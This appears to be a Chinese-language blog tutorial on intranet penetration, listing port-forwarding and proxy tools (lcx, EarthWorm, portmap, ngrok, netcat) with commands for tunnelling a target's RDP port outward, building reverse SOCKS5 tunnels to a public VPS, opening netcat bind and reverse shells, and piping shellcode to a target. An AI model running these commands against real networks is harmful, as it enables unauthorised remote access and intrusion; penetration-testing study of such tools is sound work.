Intranet Penetration(part one): 端口转发&&边界代理工具

Mr.Bai 810 浏览 0

windows

1.lcx

lcx.exe 使用教程:

监听1234端口,转发数据到2333端口

本地:

lcx.exe -listen 1234 2333

将目标的3389转发到本地的1234端口

远程:lcx.exe -slave ip 1234 127.0.0.1:3389

查看项目源码:https://github.com/henang/Intranet-Penetration/blob/master/tools/lcx

Intranet Penetration(part one): 端口转发&&边界代理工具

2.EW

Earthworm    http://rootkiter.com/Termite/

0x01 正向 SOCKS5 服务器

当目标网络边界存在公网 IP 且可任意开监听端口

ew_for_Win.exe -s ssocksd -l 8888

上述命令是在该机器开启一个 8888 的正向连接端口。然后其它主机可通过设置代理为 192.168.153.140:8888 添加这个代理

0x02 反弹 SOCKS5 服务器

当目标网络边界不存在公网 IP,通过反弹方式创建 socks 代理。先在一台具有公网 ip 的主机 A 上运行以下命令

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

意思是在我们公网 VPS 上添加一个转接隧道,把 1080 端口收到的代理请求转交给 8888 端口

在目标主机 B 上启动 SOCKS5 服务 并反弹到公网主机的 8888 端口

ew_for_Win.exe -s rssocks -d 公网Aip -e 8888

然后通过添加公网A ip:1080 这个代理, 来访问机器B内网

linux

1.portmap

DQmYthfFknxTcCW86MNu85uN7pX474X5BxFTuku1qP79X5X_1680x8400.jpeg

监听1234端口,转发数据到2333端口

本地:

./portmap -m 2 -p1 1234 -p2 2333 

将目标的3389转发到本地的1234端口

./portmap -m 1 -p1 3389 -h2 ip -p2 1234 

windows&&linux

1.ngrok

官网 : https://www.ngrok.cc/

 官方给出了使用方法

Intranet Penetration(part one): 端口转发&&边界代理工具

视频教程:http://compaign.tudou.com/v/658801319.html?

2. nc

作者:Hobbit && Chris Wysopal

网址:http://www.atstake.com/research/tools/network_utilities/

类别:开放源码

平台:Linux/BSD/Unix/Windows

WINDOWS下版本号:[v1.10 NT]

基本用法:

大概有以下几种用法:

1.连接到REMOTE主机,例子:

格式:nc -nvv 192.168.x.x 80

讲解:连到192.168.x.x的TCP80端口

2.监听LOCAL主机,例子:

格式:nc -l -p 80

讲解:监听本机的TCP80端口

3.扫描远程主机,例子:

格式:nc -nvv -w2 -z 192.168.x.x 80-445

讲解:扫描192.168.x.x的TCP80到TCP445的所有端口

4.REMOTE主机绑定SHELL,例子:

格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe

讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5.REMOTE主机绑定SHELL并反向连接,例子:

格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354

讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法(其实NC的用法还有很多,

当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。

高级用法:

6.作攻击程序用,例子:

格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80

格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt

讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)

附:c:exploit.txt为shellcode等

连接工具

1.reGeorg

2.Proxifier

3.proxychains

发表评论 取消回复
表情 图片 链接 代码

分享
请选择语言